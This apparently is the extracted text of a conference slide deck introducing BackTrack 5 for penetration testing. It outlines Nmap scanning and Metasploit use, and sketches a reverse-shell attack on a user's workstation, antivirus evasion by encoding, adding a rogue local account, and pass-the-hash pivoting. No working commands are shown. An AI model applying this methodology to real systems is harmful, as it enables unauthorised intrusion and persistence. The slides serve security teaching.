Académique Documents
Professionnel Documents
Culture Documents
What is BackTrack?
Based upon Ubuntu GNU/Linux Distribution Designed for Penetration Testing & Forensics Large collection of security-related tools ranging from port scanners to password crackers LiveCD distribution that is bootable from DVD/USB Developed and maintained by the team at OffensiveSecurity Current version is BackTrack 5 r2, kernel updated 02/24/12, ISO update 03/01/12 Free and always will be!
Persistent Installation
This is optional Easy as clicking install BackTrack from the desktop icon and following the prompts Can be installed on entire disk as primary OS Can be installed with other OS in a dual boot configuration Can be run as a virtual guest
Recommendations
Now that we have a persistent installation it is recommended to change the default root password Also take this opportunity to fix a WICD error Type reboot from terminal window
Login with the root account and the new password Enter startx to launch the GUI
Tools
The number of tools available can be intimidating The tools alone are not a means to an end Logically grouped based upon primary function Tactics and strategies (Pentest Methodology)
Scanning
The more information we gather the greater the chance of success Identify live hosts Identify OS Identify Services, banner grab Check for vulnerabilities Tool of Choice NMAP
Metasploit
Free online course from the gang at Offensive-Security (Thanks guys this is awesome!) Does it all.. can scan, can check for vulnerabilities, can create your own payloads and it can deliver them MSFConsole is where most compromised hosts are managed
Maintaining Access
If you can get a user to run a payload for you there is no need to go through the trouble of exploiting any software (SET Social Engineers Toolset) Payloads can be encoded to aid in bypassing AV software
Reverse Shell
Append the msfpayload command with O to display the available options for the selected exploit
Reverse Shell
Reverse Shell
Now that the exploit is ready to go we are going to utilize Multi/Handler to handle the exploit launched outside of the Metasploit framework
Reverse Shell
We need to tell the multi/handler what payload to expect so we configure it with the same settings that we used to compile the exploit
Reverse Shell
Now that everything is prepared we launch the attack with exploit The multi/handler handles the exploit and we have a reverse shell session to the remote host What access level does Jim have?
Moving on
With a reverse shell connection we have the same privilege level as Jim (Hope he is a local admin) Lets create a local user with our own password just for fun
The fun continues as we can now scan additional hosts and services from Jims workstation What level of access does Jim have on other workstations? (Pass the hash)
Additional Resources
www.offensive-security.com Metasploit Unleashed Free online course www.backtrack-linux.org http://www.exploit-db.com/ http://www.exploit-db.com/google-dorks/ http://www.offensive-security.com/penetrationtesting-sample-report.pdf www.thehask.com Halifax Hack Lab (Speak to Travis Barlow)
Conclusion
Have basic unix command skill , try Kubuntu Take your time Pick a few tools and learn them well This is a continual process you will always be learning You have not failed until you stop trying
Many thanks to the team at Offensive Security on being the first educational sponsor for The Atlantic Security Conference
Questions?